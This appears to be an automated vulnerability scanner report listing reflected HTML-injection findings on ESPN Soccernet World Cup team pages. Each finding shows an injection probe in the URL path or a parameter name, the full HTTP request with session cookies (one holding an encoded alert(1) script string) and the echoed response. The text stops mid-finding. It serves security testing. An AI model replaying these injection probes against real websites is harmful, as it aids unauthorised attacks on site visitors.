<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:37 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT Content-Length: 81718 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point"> ...[SNIP]...
5.71. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/215/honduras
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT Content-Length: 81826 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run"> ...[SNIP]...
5.73. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/2666/new-zealand
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT Content-Length: 82203 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT Content-Length: 81725 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through"> ...[SNIP]...
5.75. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4469/ghana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT Content-Length: 81833 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT Content-Length: 80274 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on"> ...[SNIP]...
5.77. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/448/england
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
